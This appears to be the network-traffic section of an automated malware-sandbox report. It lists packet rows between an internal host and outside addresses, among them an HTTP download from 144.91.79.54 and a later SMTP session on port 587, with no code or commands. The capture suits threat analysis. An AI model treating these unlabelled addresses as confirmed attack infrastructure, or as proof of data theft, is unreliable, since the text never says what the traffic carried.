                                    Jan 14, 2025 08:47:12.859819889 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.859822989 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859857082 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859884024 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.859891891 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859930038 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859955072 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.859963894 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859997034 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860032082 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860045910 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.860065937 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860095024 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.860099077 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860131025 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860145092 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.860166073 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860200882 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860214949 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.860234022 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860270977 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860285997 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.860373020 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860407114 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860420942 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.860440969 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860476971 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860495090 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.860511065 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860543966 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860559940 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.860579014 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860611916 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860639095 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.860646963 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860682964 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860696077 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.860717058 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860750914 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860768080 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.860785007 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860821009 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.860833883 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.865128040 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865161896 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865183115 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.865216017 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865252972 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865305901 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.865307093 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865340948 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865375042 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865397930 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.865407944 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865411043 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.865442038 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865477085 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865509987 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865519047 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.865544081 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865561008 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.865577936 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865629911 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865643978 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.865664959 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865695000 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865701914 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.865729094 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865771055 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.865792036 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865828991 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865864038 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865875959 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.865906000 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865952969 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.865957022 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.865988970 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.866036892 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.866043091 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.866075993 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.866110086 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.866130114 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.866142988 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.866178989 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.866189957 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.866211891 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.866245985 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.866259098 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.866280079 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.866314888 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.866329908 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.866348982 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.866401911 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.866415024 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.866435051 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.866472960 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.866489887 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.866503000 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.866535902 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.866545916 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.866570950 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.866600037 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.866617918 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.921165943 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.944449902 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944468021 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944484949 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944499969 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944523096 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.944540977 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944566965 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944585085 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944592953 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.944600105 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944616079 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.944622993 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944645882 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.944647074 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944664955 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944679976 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944696903 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944710016 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.944713116 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944730043 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944741011 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.944745064 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944760084 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.944761992 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944789886 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944792032 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.944807053 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944823980 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944830894 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.944839954 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.944889069 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.950342894 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950360060 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950375080 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950392008 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950392008 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.950417995 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.950417995 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950433969 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950450897 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950463057 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.950479031 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950503111 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950517893 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950530052 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.950532913 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950550079 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950557947 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.950566053 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950582027 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.950591087 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950602055 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.950608015 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950623035 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950649023 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.950651884 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950668097 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950690031 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950706959 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950711012 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.950722933 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950736046 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.950738907 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950766087 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.950783014 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950799942 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950815916 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950831890 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950846910 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950855017 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.950881004 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.950926065 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950941086 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950963974 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950978994 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.950990915 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.950994968 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951011896 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951020956 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.951028109 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951044083 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951056004 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.951071978 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951078892 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.951100111 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951117039 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951132059 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951148987 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951164007 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951179028 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.951189041 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.951200008 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.951268911 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951293945 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951309919 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951334000 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951349020 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951353073 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.951364040 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951376915 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.951380014 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951395988 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951411963 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.951412916 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951432943 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951437950 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.951448917 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951464891 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951477051 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.951504946 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.951658010 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951688051 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951704025 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951719046 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951736927 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951749086 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.951751947 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951764107 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.951769114 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951786041 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951797962 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.951802015 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951817989 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951836109 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951843023 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.951852083 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951865911 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.951869011 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951884985 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951894999 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.951903105 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951917887 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951926947 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.951945066 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951955080 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.951961994 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951981068 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.951997042 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952008963 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.952044964 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.952079058 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952094078 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952109098 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952125072 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952141047 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952157021 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.952168941 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.952172041 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952194929 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952210903 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952228069 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952241898 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.952244043 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952260971 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952261925 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.952277899 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952285051 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.952294111 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952321053 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.952336073 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952352047 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952370882 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952399969 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952414989 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.952419043 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952433109 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952450991 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952466965 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952481031 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.952483892 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952498913 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.952502012 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.952522039 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.999303102 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:13.031260014 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:13.031281948 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:13.031301975 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:13.031331062 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:13.031362057 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:13.031388044 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:13.512413979 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:15.452419043 CET49677443192.168.2.720.50.201.200
                                    Jan 14, 2025 08:47:17.171221972 CET49675443192.168.2.7104.98.116.138
                                    Jan 14, 2025 08:47:17.171308994 CET49674443192.168.2.7104.98.116.138
                                    Jan 14, 2025 08:47:17.343193054 CET49672443192.168.2.7104.98.116.138
                                    Jan 14, 2025 08:47:19.779995918 CET44349698104.98.116.138192.168.2.7
                                    Jan 14, 2025 08:47:19.780116081 CET49698443192.168.2.7104.98.116.138
                                    Jan 14, 2025 08:47:20.249316931 CET49671443192.168.2.7204.79.197.203
                                    Jan 14, 2025 08:47:21.405627966 CET49677443192.168.2.720.50.201.200
                                    Jan 14, 2025 08:47:33.311860085 CET49677443192.168.2.720.50.201.200
                                    Jan 14, 2025 08:48:15.293291092 CET49970443192.168.2.7104.26.12.205
                                    Jan 14, 2025 08:48:15.293318987 CET44349970104.26.12.205192.168.2.7
                                    Jan 14, 2025 08:48:15.293407917 CET49970443192.168.2.7104.26.12.205
                                    Jan 14, 2025 08:48:15.300683975 CET49970443192.168.2.7104.26.12.205
                                    Jan 14, 2025 08:48:15.300704956 CET44349970104.26.12.205192.168.2.7
                                    Jan 14, 2025 08:48:15.767409086 CET44349970104.26.12.205192.168.2.7
                                    Jan 14, 2025 08:48:15.767576933 CET49970443192.168.2.7104.26.12.205
                                    Jan 14, 2025 08:48:15.769650936 CET49970443192.168.2.7104.26.12.205
                                    Jan 14, 2025 08:48:15.769661903 CET44349970104.26.12.205192.168.2.7
                                    Jan 14, 2025 08:48:15.769865990 CET44349970104.26.12.205192.168.2.7
                                    Jan 14, 2025 08:48:15.812055111 CET49970443192.168.2.7104.26.12.205
                                    Jan 14, 2025 08:48:15.929480076 CET49970443192.168.2.7104.26.12.205
                                    Jan 14, 2025 08:48:15.971335888 CET44349970104.26.12.205192.168.2.7
                                    Jan 14, 2025 08:48:16.042311907 CET44349970104.26.12.205192.168.2.7
                                    Jan 14, 2025 08:48:16.042371035 CET44349970104.26.12.205192.168.2.7
                                    Jan 14, 2025 08:48:16.042505026 CET49970443192.168.2.7104.26.12.205
                                    Jan 14, 2025 08:48:16.059478045 CET49970443192.168.2.7104.26.12.205
                                    Jan 14, 2025 08:48:18.348301888 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:18.353362083 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:18.353478909 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:18.935760021 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:18.936139107 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:18.940952063 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.097470999 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.098611116 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:19.103523970 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.263585091 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.264323950 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:19.269181013 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.429223061 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.429466963 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:19.434317112 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.590367079 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.592425108 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:19.597184896 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.755903959 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.756150007 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:19.760973930 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.917481899 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.918194056 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:19.918253899 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:19.918253899 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:19.918253899 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:19.923091888 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.923125029 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.923219919 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.923269033 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:20.192673922 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:20.233962059 CET49972587192.168.2.7162.254.34.31

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 14, 2025 08:47:15.088253021 CET5217353192.168.2.71.1.1.1
                                    Jan 14, 2025 08:48:15.279548883 CET6548553192.168.2.71.1.1.1
                                    Jan 14, 2025 08:48:15.286621094 CET53654851.1.1.1192.168.2.7

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
